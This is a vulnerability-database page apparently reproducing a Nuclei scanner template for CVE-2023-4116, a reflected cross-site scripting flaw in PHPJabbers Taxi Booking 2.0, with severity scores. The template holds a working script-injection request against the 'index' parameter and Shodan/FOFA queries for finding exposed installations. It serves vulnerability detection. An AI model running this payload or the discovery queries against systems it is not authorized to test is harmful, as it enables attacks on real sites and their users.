Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-4116
HistoryOct 17, 2023 - 7:20 a.m.

PHPJabbers Taxi Booking 2.0 - Cross Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
2
cve
phpjabbers
packetstorm
xss
cwe79

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.1 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

68.0%

A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.
id: CVE-2023-4116

info:
  name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39746
    - https://cxsecurity.com/ascii/WLB-2023080016
    - http://packetstormsecurity.com/files/173937/PHPJabbers-Taxi-Booking-2.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4116
    - https://vuldb.com/?ctiid.235963
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4116
    cwe-id: CWE-79
    epss-score: 0.0027
    epss-percentile: 0.67777
    cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpjabbers
    product: taxi_booking_script
    shodan-query:
      - html:"PHP Jabbers.com"
      - http.html:"php jabbers.com"
    fofa-query: body="php jabbers.com"
  tags: cve,cve2023,packetstorm,xss,phpjabbers

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "Passengers", "Drop-off address", "><script>alert(document.domain)</script>")'
        condition: and
# digest: 4b0a004830460221008c1f36c601fc8963fc32e00b4fdb8e8a6269b00d3f59e5dd8216ecf1ae06de4d022100a7e5be57de477a7cdb02508af120769b1fa8caa60d40df44ba59630a533f97e7:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.1 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

68.0%

Related for NUCLEI:CVE-2023-4116